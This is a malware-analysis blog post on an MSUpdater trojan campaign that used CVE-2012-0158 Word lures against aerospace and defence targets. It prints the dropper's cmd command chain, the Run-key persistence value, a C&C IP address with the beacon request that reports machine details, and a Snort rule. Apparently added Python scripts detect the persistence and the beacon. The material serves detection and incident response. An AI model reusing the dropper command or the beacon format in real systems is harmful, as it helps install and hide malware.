MSUpdater Trojan found using CVE-2012-0158: Space and Missile Defense Conference

April 23, 2012 | Jaime Blasco

The number of samples exploiting CVE-2012-0158 has been growing since we reported some of the first infections last week. We have been detecting several ongoing campaigns against several industries. One of the campaigns which attracted our attention is targeting the military and aerospace industry.

Some of the documents sent to the victims still have low antivirus detection rates. For example, one of the files sent is called “SMD_Conference_2012.doc”.

https://www.virustotal.com/file/b2b2091ed7d211b713353affa7e4e6585ae8abbbc8fc3eede74d0c93f39a7f6b/analysis/

When the victim opens the malicious document, the shellcode drops the malware and a benign office file, then it executes the dropped binary and shows the office file:

cmd /c echo MZ>log1.txt && cmd /c copy /b log1.txt+fabc.scr abc.scr && cmd /c abc.scr && cmd /c del log1.txt && cmd /c del fabc.scr

cmd /c SMD_Conference2012.doc

The victim is then shown the following decoy document:

The binary created by the shellcode is a dropper that contains the actual malware embedded in a resource. After decrypting that resource, it writes the new binary to \Documents and Settings\{UserName}\Local Settings\Application Data\GoogleUpdate.exe and creates the following registry value in order to maintain persistence:

\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN

GoogleUpd  SZ  "C:\Documents and Settings\Joe Maldive\Local Settings\Application Data\GoogleUpdate.exe"
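The persistence value above is the kind of thing a responder checks for across a fleet. The following is an added example, not code from the post or from AlienVault: it parses the text output of `reg query` for the Run key (the constructed sample below mimics that format, including the entry from this post) and flags autorun images that live in a user-writable profile directory or that borrow the GoogleUpdate.exe name outside Program Files. The directory list and the flagging criteria are my assumptions, chosen to match the indicator on this page.

```python
import re

# Constructed sample of `reg query HKCU\...\Run` output (not captured from a real host).
# The first entry reproduces the persistence value described in the post.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    GoogleUpd    REG_SZ    "C:\Documents and Settings\Joe Maldive\Local Settings\Application Data\GoogleUpdate.exe"
    ctfmon.exe    REG_SZ    C:\WINDOWS\system32\ctfmon.exe
    Google Update    REG_SZ    "C:\Program Files\Google\Update\GoogleUpdate.exe" /c
"""

# One indented line per value: <name> REG_SZ|REG_EXPAND_SZ <data>
ENTRY_RE = re.compile(r'^\s+(?P<name>.+?)\s+REG_(?:EXPAND_)?SZ\s+(?P<data>.+?)\s*$')

# Per-user, user-writable locations (assumption: XP and Vista+ equivalents of the path in the post).
USER_WRITABLE_DIRS = (
    '\\local settings\\application data\\',   # XP per-user dir used by this sample
    '\\appdata\\local\\',                      # Vista+ equivalent
    '\\appdata\\roaming\\',
    '\\temp\\',
)


def image_path(data):
    """Extract the executable path from a Run value's data, honoring a quoted path."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split(' ')[0]


def parse_run_entries(text):
    """Return (value name, image path) pairs from reg query output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m.group('name'), image_path(m.group('data'))))
    return entries


def flag_entries(entries):
    """Return (name, path, reasons) for entries matching the persistence pattern in the post."""
    flagged = []
    for name, path in entries:
        low = path.lower()
        reasons = []
        if any(d in low for d in USER_WRITABLE_DIRS):
            reasons.append('autorun image in user-writable profile directory')
        if low.endswith('googleupdate.exe') and '\\program files' not in low:
            reasons.append('GoogleUpdate.exe outside Program Files (name impersonation)')
        if reasons:
            flagged.append((name, path, reasons))
    return flagged


if __name__ == '__main__':
    for name, path, reasons in flag_entries(parse_run_entries(SAMPLE_REG_QUERY)):
        print(f'{name}: {path}\n  ' + '\n  '.join(reasons))
```

On a live system the same functions can be fed the output of `reg query` for both the HKCU and HKLM Run keys; the legitimate Google updater under Program Files is deliberately left unflagged so the check stays useful as a hunt query.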

The payload is detected as BKDR_FYNLOS.SM1 and has been used in similar attacks in the past. The malware connects to the C&C server at 204.13.66.119.

The following HTTP request is sent to the C&C server:

GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1

Accept: */*

User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)

Host: 204.13.66.119

Connection: Keep-Alive

The values sent are the operating system version (5.1 = Windows XP), the encoded serial number of the machine and the encoded machine name.

It seems to be a version of the trojan called MSUpdater that was described by Zscaler a few months ago. Once again the group behind these attacks is using conference-related subjects as a lure to target these industries.

You can use the following Snort rule, already present in the Emerging Threats ruleset, to detect the C&C traffic:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET TROJAN Win32/Cryptrun.B/MSUpdater C&C traffic 1"; flow:from_client,established; content:"/search"; http_uri; content:"?h1="; fast_pattern; http_uri; content:"&h2="; distance:0; http_uri; content:"&h3="; distance:0; http_uri; content:"User-Agent|3a| Mozilla/5.0 (compatible|3B|"; http_header; reference:url,blog.9bplus.com/kim-jong-il-pdf-malware; reference:url,www.seculert.com/reports/MSUpdaterTrojanWhitepaper.pdf; reference:url,research.zscaler.com/2012/01/msupdater-trojan-and-link-to-targeted.html; reference:url,blog.seculert.com/2012/01/msupdater-trojan-and-conference-invite.html; classtype:trojan-activity; sid:2014174; rev:4;)
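To show what the rule actually keys on, here is an added example (mine, not the post's or Emerging Threats' code) that applies the same logic to raw HTTP requests: "/search" anywhere in the URI, then "?h1=", "&h2=" and "&h3=" in that order (the distance:0 chain), plus "Mozilla/5.0 (compatible;" in the User-Agent header. It returns the h1..h4 parameters and the User-Agent token for the analyst, without claiming how they are encoded. The beacon sample is reconstructed from the request shown above; the benign request is constructed so a normal /search URL does not trigger.

```python
# Request from the post, reconstructed as a sample with CRLF line endings.
BEACON = (
    b"GET /search54615?h1=51&h2=1&h3=fh17952&h4=FNFACAADHFBCEIFJFEFGFAAA HTTP/1.1\r\n"
    b"Accept: */*\r\n"
    b"User-Agent: Mozilla/5.0 (compatible;AEAFAKEBFDENBMECAOAHFCAEABBDEJ;)\r\n"
    b"Host: 204.13.66.119\r\n"
    b"Connection: Keep-Alive\r\n\r\n"
)

# Constructed benign request: shares the /search prefix but not the parameter chain.
BENIGN = (
    b"GET /search?q=snort+rules HTTP/1.1\r\n"
    b"User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)\r\n"
    b"Host: www.example.com\r\n\r\n"
)

UA_MARKER = b"Mozilla/5.0 (compatible;"   # the http_header content of the rule


def parse_request(raw):
    """Minimal HTTP/1.x request parser: returns method, URI and lowercased header map."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3:
        return None
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return {"method": parts[0], "uri": parts[1], "headers": headers}


def ordered_contains(haystack, needles):
    """Emulate Snort's content chain with distance:0 — each match must start after the previous one ends."""
    pos = 0
    for needle in needles:
        i = haystack.find(needle, pos)
        if i < 0:
            return False
        pos = i + len(needle)
    return True


def matches_msupdater_beacon(raw):
    """Return extracted beacon fields if the request matches the rule's logic, else None."""
    req = parse_request(raw)
    if req is None:
        return None
    uri = req["uri"]
    if b"/search" not in uri:                      # content:"/search"; http_uri
        return None
    if not ordered_contains(uri, [b"?h1=", b"&h2=", b"&h3="]):   # the distance:0 chain
        return None
    ua = req["headers"].get(b"user-agent", b"")
    if UA_MARKER not in ua:                        # content:"User-Agent|3a| Mozilla/5.0 (compatible|3B|"
        return None
    query = uri.partition(b"?")[2]
    params = dict(p.split(b"=", 1) for p in query.split(b"&") if b"=" in p)
    ua_token = ua.split(UA_MARKER, 1)[1].strip(b";) ")
    return {
        "host": req["headers"].get(b"host", b"").decode(),
        "h1": params.get(b"h1", b"").decode(),
        "h2": params.get(b"h2", b"").decode(),
        "h3": params.get(b"h3", b"").decode(),
        "h4": params.get(b"h4", b"").decode(),
        "ua_token": ua_token.decode(),
    }


if __name__ == "__main__":
    print(matches_msupdater_beacon(BEACON))
    print(matches_msupdater_beacon(BENIGN))   # None
```

The extracted h1..h4 values and the User-Agent token are what you would pivot on in proxy logs to group infected hosts; the post identifies them as the OS version and encoded machine identifiers, so the token rather than the destination IP is the stable field if the C&C address changes.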

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.